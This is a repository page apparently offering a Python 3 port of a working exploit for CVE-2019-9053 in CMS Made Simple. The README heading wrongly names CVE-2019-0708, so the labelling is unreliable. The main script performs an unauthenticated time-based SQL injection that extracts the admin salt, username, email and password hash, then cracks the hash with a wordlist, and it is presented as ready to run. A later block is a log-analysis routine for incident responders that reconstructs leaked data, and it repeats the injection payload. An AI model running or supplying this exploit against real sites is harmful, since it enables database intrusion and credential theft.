Hackheart-tech/-exploit-lab

-exploit-lab

Exploits Python cve-2019-0708 – by HackHeart

🧠 Code Review & Porting - Python 2 → Python 3

This exploit was originally written in Python 2, which is no longer supported by modern systems. To ensure compatibility and maintain future-proof tooling, the entire codebase has been carefully reviewed and migrated to Python 3.

🔧 Key improvements during the port:

Updated print statements to Python 3 syntax

Replaced raw_input() with input()

Adapted socket operations to handle bytes/str properly (.decode() added)

Removed deprecated methods like xrange() and .iteritems()

Validated script compatibility with Python 3.8+ and modern Linux distros

🛡️ This version maintains the exploit logic intact while ensuring:

Compatibility with modern OSCP / Red Team labs

Cleaner, safer, and more readable syntax

Ready-to-run in modern environments (VS Code, Kali, Parrot OS…)

```python
#!/usr/bin/env python3
# CVE-2019-9053 - CMS Made Simple <= 2.2.9 - Unauthenticated SQL Injection

import requests
import time
import argparse
import hashlib

parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', required=True, help="Base target URI (e.g. http://10.10.10.100/cms)")
parser.add_argument('-w', '--wordlist', help="Wordlist for cracking admin password")
parser.add_argument('-c', '--crack', action='store_true', help="Crack password with wordlist")

args = parser.parse_args()

url_vuln = args.url.rstrip('/') + '/moduleinterface.php?mact=News,m1_,default,0'
session = requests.Session()
dictionary = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@._-$'
TIME = 1

flag = True
salt = ''
username = ''
email = ''
password_hash = ''
output = ""


def dump_field(field_name, table, column, condition):
    global flag
    result = ""
    ord_result = ""
    while flag:
        flag = False
        for char in dictionary:
            temp_result = result + char
            ord_temp_result = ord_result + format(ord(char), "x")
            print(f"[*] Trying {temp_result}")
            payload = f"a,b,1,5))+AND+(SELECT+SLEEP({TIME})+FROM+{table}+WHERE+{column}+LIKE+0x{ord_temp_result}25+AND+{condition})--+"
            start_time = time.time()
            session.get(url_vuln + "&m1_idlist=" + payload)
            if time.time() - start_time >= TIME:
                result = temp_result
                ord_result = ord_temp_result
                flag = True
                break
    return result


print("[+] Extracting salt...")
flag = True
salt = dump_field("salt", "cms_siteprefs", "sitepref_value", "sitepref_name+LIKE+0x736974656d61736b")
output += f"Salt: {salt}\n"

print("[+] Extracting username...")
flag = True
username = dump_field("username", "cms_users", "username", "user_id+LIKE+0x31")
output += f"Username: {username}\n"

print("[+] Extracting email...")
flag = True
email = dump_field("email", "cms_users", "email", "user_id+LIKE+0x31")
output += f"Email: {email}\n"

print("[+] Extracting password hash...")
flag = True
password_hash = dump_field("password", "cms_users", "password", "user_id+LIKE+0x31")
output += f"Hash: {password_hash}\n"

if args.crack and args.wordlist:
    print("[+] Cracking password...")
    with open(args.wordlist, 'r', encoding='utf-8', errors='ignore') as f:
        for line in f:
            word = line.strip()
            print(f"[*] Trying password: {word}")
            if hashlib.md5((salt + word).encode()).hexdigest() == password_hash:
                output += f"[+] Password cracked: {word}\n"
                break

print("\n=== Exploit Results ===")
print(output)
```
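For incident response, the probes this script sends are visible in web server access logs, and the slow responses show which guesses matched, so a responder can work out what a client actually extracted. The following is an added example, not code from this repository; it assumes an access log whose last field is the request time in seconds, and the names `LINE`, `PROBE`, `reconstruct_leak` and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumed log layout: client "request line" status request_seconds
LINE = re.compile(r'^(\S+) "GET (\S+) HTTP/[\d.]+" \d+ ([\d.]+)$')
# Shape of the probe the script above places in the m1_idlist parameter
PROBE = re.compile(r"SLEEP\((\d+)\)\s+FROM\s+(\w+)\s+WHERE\s+(\w+)\s+LIKE\s+"
                   r"0x((?:[0-9a-f]{2})+)25\s", re.I)

BASE = "/cms/moduleinterface.php?mact=News,m1_,default,0&m1_idlist="
INJ = ("a,b,1,5))+AND+(SELECT+SLEEP(1)+FROM+cms_users+WHERE+username"
       "+LIKE+0x{}25+AND+user_id+LIKE+0x31)--+")
# Constructed sample traffic (documentation IP ranges), not real logs
SAMPLE_LOG = "\n".join([
    f'192.0.2.10 "GET {BASE}3,4 HTTP/1.1" 200 0.021',
    f'198.51.100.7 "GET {BASE}{INJ.format("31")} HTTP/1.1" 200 0.030',
    f'198.51.100.7 "GET {BASE}{INJ.format("61")} HTTP/1.1" 200 1.020',
    f'198.51.100.7 "GET {BASE}{INJ.format("6131")} HTTP/1.1" 200 0.028',
    f'198.51.100.7 "GET {BASE}{INJ.format("6164")} HTTP/1.1" 200 1.035',
    f'198.51.100.7 "GET {BASE}{INJ.format("616431")} HTTP/1.1" 200 0.031',
])


def reconstruct_leak(log_text):
    """Return {(client, table, column): [probe_count, longest_confirmed_prefix]}."""
    found = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        client, target, seconds = m.group(1), m.group(2), float(m.group(3))
        # parse_qs turns '+' back into spaces, as the server would see it
        idlist = parse_qs(urlsplit(target).query).get("m1_idlist", [""])[0]
        p = PROBE.search(idlist)
        if not p:
            continue
        entry = found.setdefault((client, p.group(2), p.group(3)), [0, ""])
        entry[0] += 1
        guess = bytes.fromhex(p.group(4)).decode("latin-1")
        # A response at least as slow as the SLEEP argument means the guess matched
        if seconds >= int(p.group(1)) and len(guess) > len(entry[1]):
            entry[1] = guess
    return found


if __name__ == "__main__":
    for key, (count, prefix) in reconstruct_leak(SAMPLE_LOG).items():
        print(key, f"probes={count}", f"confirmed prefix={prefix!r}")
```

MySQL's default collations make `LIKE` case-insensitive and treat `_` as a single-character wildcard, so the reconstructed prefix shows what the client learned and may differ from the stored value in letter case.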

About

Exploits Python cve-2019-9053 – by HackHeart
